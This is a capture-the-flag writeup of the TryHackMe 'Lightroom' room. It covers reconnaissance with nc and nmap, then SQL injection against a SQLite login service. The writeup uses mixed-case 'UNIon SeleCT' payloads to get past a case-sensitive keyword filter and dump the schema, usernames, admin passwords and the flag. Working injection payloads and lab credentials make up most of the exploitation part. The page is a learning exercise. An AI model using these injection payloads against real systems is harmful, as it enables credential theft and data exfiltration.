~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • THM Lightroom


    Reconnaissance:

    nc 10.65.167.181 1337

    We enter our given credentials:

    username: smokey

    Password: vYQ5ngPpw8AdUmL

    nmap -sV -sC -v

    PORT STATE SERVICE VERSION

    22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)

    ssh-hostkey:
      3072 cf:56:80:f0:b2:4a:98:67:8f:44:a0:25:f9:a9:bc:a4 (RSA)
      256 01:f1:13:e6:c2:b3:2c:5a:e3:ae:b6:20:0d:1c:a5:56 (ECDSA)

    |_ 256 a6:75:4e:74:55:fe:80:05:b6:7a:56:c2:cb:7c:41:10 (ED25519)

    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    After entering ’ in our nc

    “’ LIMIT 30”

    That’s a SQL error. Specifically, this informs us that there’s a syntax error in our SQL code. So we are passing arbitrary SQL statements here, now we can exploit this vulnerability. The only safeguard we have to dodge here is that our SQL statement need to exclude specific terms but more importantly those terms aren’t been sanitize properly; the sanitizing function doesn’t account for capital/lowercase letter combinations.


    Exploitation:

    We tried a few injections and manager to get sqlite_version()

    3.31.1

    ’ UNIon SeleCT * FROM sqlite_master’

    Error: SELECTs to the left and right of UNION do not have the same number of result columns

    ’ UNIon SeleCT group_concat(sql) from sqlite_master’

    Password: CREATE TABLE usertable (

                  id INTEGER PRIMARY KEY,  
                   username TEXT,  
                  password INTEGER),CREATE TABLE admintable (  
                  id INTEGER PRIMARY KEY,  
                  username TEXT,  
                  password INTEGER)  

    ’ UNIon SeleCT group_concat(username) from usertable’

    Username: alice,rob,john,michael,smokey,hazel,ralph,steve

    ’ UNIon SeleCT group_concat(username) from admintable’

    Password: TryHackMeAdmin,flag

    ’ UNIon SeleCT group_concat(username) from admintable’

    Username: TryHackMeAdmin,flag

    We then entered TryHackMeAdmin and flag but it doesn’t spit out the passwords so

    ’ UNIon SeleCT group_concat(password) from admintable’

    Password: mamZtAuMlrsEy5bp6q17,THM{SQLit3_InJ3cTion_is_SimplE_nO?}

    We now have all 3 flags


    Notes:

    Arbitrary user input code is a recipe for disaster and arbitrary SQL code allows the modification or exfiltration of sensitive data, such as credentials, personal identifiable information and whatever else could be stored in there.


    Tools: